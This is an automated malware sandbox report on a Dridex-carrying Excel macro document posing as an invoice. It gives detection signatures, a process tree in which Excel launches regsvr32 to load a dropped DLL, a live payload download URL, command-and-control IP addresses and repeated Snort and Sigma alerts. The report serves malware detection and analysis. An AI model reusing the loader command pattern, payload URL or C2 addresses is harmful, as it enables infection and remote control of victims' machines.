Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report INV2680371456-20210111889374.xlsm

Overview

General Information

Sample Name:INV2680371456-20210111889374.xlsm
Analysis ID:338309
MD5:9b7c2b0abf5478ef9a23d9a9e87c7835
SHA1:6931c4b845a8a952699d9cf85b316e3b3d826a41
SHA256:a463f9a8842a5c947abaa2bff1b621835ff35f65f9d3272bf1fa5197df9f07d0

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: BlueMashroom DLL Load
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Anomaly
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains sections with non-standard names
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the installation date of Windows
Registers a DLL
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2292 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2500 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll. MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2504 cmdline: -s C:\Users\user\AppData\Local\Temp\aymakjne.dll. MD5: 432BE6CF7311062633459EEF6B242FB5)
    • DW20.EXE (PID: 2448 cmdline: 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1840 MD5: 45A078B2967E0797360A2D4434C41DB4)
      • DWWIN.EXE (PID: 1296 cmdline: C:\Windows\system32\dwwin.exe -x -s 1840 MD5: 25247E3C4E7A7A73BAEEA6C0008952B1)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 61074", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 0"]}

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: BlueMashroom DLL LoadShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2292, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll., ProcessId: 2500
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2292, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll., ProcessId: 2500
Sigma detected: Regsvr32 AnomalyShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2292, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll., ProcessId: 2500

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://truxiellogroup.com/d0l359.rarAvira URL Cloud: Label: malware
Found malware configurationShow sources
Source: 4.2.regsvr32.exe.240000.1.raw.unpackMalware Configuration Extractor: Dridex {"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 61074", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 0"]}
Multi AV Scanner detection for domain / URLShow sources
Source: https://77.220.64.37/Virustotal: Detection: 7%Perma Link
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d0l359[1].rarReversingLabs: Detection: 37%
Source: C:\Users\user\AppData\Local\Temp\aymakjne.dllReversingLabs: Detection: 37%
Multi AV Scanner detection for submitted fileShow sources
Source: INV2680371456-20210111889374.xlsmVirustotal: Detection: 46%Perma Link
Source: INV2680371456-20210111889374.xlsmReversingLabs: Detection: 32%
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\aymakjne.dllJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d0l359[1].rarJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49175 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49179 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49183 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49187 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49191 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49195 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49199 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49203 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49207 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49211 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49215 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49219 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49223 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49229 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49233 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49237 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49241 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49245 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49249 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49253 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49257 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49261 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49265 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49269 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49273 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49277 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49281 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49285 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49289 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49293 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49297 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49301 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49305 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49309 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49313 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49317 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49321 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49325 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49329 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49333 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49337 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49341 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49345 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49349 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49353 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49357 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49362 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49366 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49370 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49374 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49378 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49382 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49386 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49390 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49394 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49398 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (creates forbidden files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\aymakjne.dllJump to behavior
Document exploit detected (drops PE files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: d0l359[1].rar.0.drJump to dropped file
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
Source: global trafficDNS query: name: truxiellogroup.com
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 77.220.64.37:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 68.65.122.35:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49166
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49168
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49169
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49169
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49171
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49172
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49173
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49173
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49175
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49176
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49177
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49177
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49179
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49180
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49181
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49181
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49183
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49184
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49185
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49185
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49187
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49188
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49189
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49189
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49191
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49192
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49193
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49193
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49195
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49196
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49197
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49197
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49199
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49200
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49201
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49201
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49203
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49204
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49205
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49205
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49207
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49208
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49209
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49209
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49211
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49212
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49213
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49213
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49215
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49216
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49217
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49217
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49219
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49220
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49221
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49221
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49223
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49225
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49226
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49226
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49229
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49230
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49231
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49231
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49233
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49234
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49235
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49235
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49237
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49238
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49239
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49239
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49241
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49242
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49243
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49243
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49245
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49246
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49247
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49247
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49249
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49250
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49251
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49251
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49253
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49254
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49255
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49255
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49257
